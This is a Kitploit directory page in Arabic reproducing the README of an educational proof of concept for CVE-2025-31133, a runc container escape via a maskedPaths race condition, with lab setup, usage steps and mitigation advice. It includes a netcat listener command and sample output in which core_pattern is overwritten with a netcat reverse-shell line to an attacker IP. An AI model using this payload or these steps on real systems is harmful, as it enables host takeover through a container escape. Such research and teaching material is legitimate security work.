Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Learn-about-cve-2025-31133-poc — إثبات المفهوم التعليمي لـ CVE-2025-31133، وهو هروب من حاوية runc عبر حالة سباق maskedPaths. يشمل إعداد المختبر، ونصًا برمجيًا للاستغلال، وإرشادات التخفيف لباحثي الأمن. | Kitploit
أدوات/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمالهروب من الحاويةمختبرات وتدريب عملي
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

إثبات المفهوم التعليمي لـ CVE-2025-31133، وهو هروب من حاوية runc عبر حالة سباق maskedPaths. يشمل إعداد المختبر، ونصًا برمجيًا للاستغلال، وإرشادات التخفيف لباحثي الأمن.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
23منذ 4 أشهرلم تتم المراجعة بعد

تعرّف على CVE-2025-31133-poc

نظرة عامة

مظاهرة لإثبات المفهوم وبيئة تعلم لـ CVE-2025-31133، وهي ثغرة أمنية في runc تسمح بتجاوز حماية maskedPaths من خلال حالة سباق. تم تصميم maskedPaths لمنع الحاويات من الوصول إلى مسارات نظام الملفات الحساسة للمضيف.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 هذا المستودع هو مثال عملي على الأساليب والتقنيات البحثية المحددة المدرّسة في تدريب Black Hat:

إذا وجدت هذا مثيرًا للاهتمام، فهذه مجرد غيض من فيض.

أمن الحاويات الهجومي: دورة متقدمة في كسر الحدود

📅 تواريخ التدريب في Black Hat USA 2026:

1-2 أغسطس

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

3-4 أغسطس

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

تفاصيل الثغرة

  • معرف CVE: CVE-2025-31133
  • المكون: runc (بيئة تشغيل الحاويات)
  • ناقل الهجوم: حالة سباق في معالجة maskedPaths
  • التأثير: الهروب من الحاوية

كيف يعمل

يستغل الاستغلال حالة سباق حيث:

  1. يتم تكوين حاوية مع maskedPaths لحماية الملفات الحساسة (مثل /proc/sys/kernel/core_pattern)
  2. أثناء تهيئة الحاوية، تحدث حالة سباق بين:
    • حذف عقدة جهاز (/dev/null) في نظام ملفات جذر الحاوية
    • إعادة إنشاء عقدة الجهاز تلك
  3. تسمح نافذة التوقيت هذه بتجاوز حماية المسار المقنع
  4. يمكن للمهاجم الكتابة إلى الملفات المحمية التي يجب أن تكون مقنعة

⚠️ إخلاء مسؤولية

هذا المستودع مخصص للأغراض التعليمية فقط.

  • استخدم فقط في بيئات معزولة ومضبوطة
  • لا تستخدم ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها
  • المؤلف غير مسؤول عن أي إساءة استخدام لهذا الرمز
  • يمكن أن يتسبب هذا الاستغلال في عدم استقرار النظام أو فقدان البيانات

المتطلبات الأساسية

  • نظام Linux (يوصى بـ Ubuntu)
  • وصول الجذر/صلاحيات sudo
  • اتصال بالإنترنت
  • فهم أساسي لبيئات تشغيل الحاويات والأمان

الإعداد

1. استنساخ أو تنزيل هذا المستودع

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. تشغيل نص الإعداد المخبري

سينفذ نص lab-setup.sh ما يلي:

  • تثبيت التبعيات
  • تعيين إصدار runc الضعيف v1.2.0
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. التحقق من الإعداد

تحقق من تثبيت إصدار runc الضعيف:

root@kitploit:~
runc --version

يجب أن ترى الإصدار 1.2.0 أو ما شابه.

تشغيل الاستغلال

الاستخدام الأساسي

  1. ابدأ مستمعًا على جهاز المهاجم لاستقبال الصدفة العكسية:
root@kitploit:~
nc -lnvp <PORT>
  1. شغّل نص الاستغلال:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. قدم المعلومات المطلوبة عند الطلب:
    • عنوان IP للمهاجم
    • منفذ المهاجم (حيث يعمل المستمع الخاص بك)

المخرجات المتوقعة

عند النجاح، يجب أن ترى:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

يجب إنشاء اتصال صدفة عكسية إلى المستمع الخاص بك.

التخفيف

للحماية من هذه الثغرة:

  1. قم بتحديث runc إلى إصدار مصحح (v1.2.1 أو أحدث)
  2. حافظ على تحديث بيئات تشغيل الحاويات بانتظام
  3. استخدم مبادئ الامتياز الأقل - قم بتشغيل الحاويات في مساحة مستخدم غير جذرية

المراجع

  • أرشيف البريد
  • مستودع GitHub لإثبات المفهوم للثغرة

ملاحظات

  • قد يتطلب الاستغلال عدة محاولات للنجاح بسبب طبيعة حالة السباق
  • يعتمد معدل النجاح على حمل النظام والتوقيت
  • يقوم النص تلقائيًا باستعادة core_pattern الأصلي بعد الاستغلال الناجح
  • يتم التعامل مع التنظيف تلقائيًا عبر معالجات الإشارات

الترخيص

تم توفير هذا المشروع للأغراض التعليمية. استخدمه بمسؤولية وأخلاقية.


تذكر: استخدم دائمًا أدوات البحث الأمني بمسؤولية وفقط في البيئات التي تمتلكها أو لديك إذن صريح لاختبارها.

تنزيل الأداة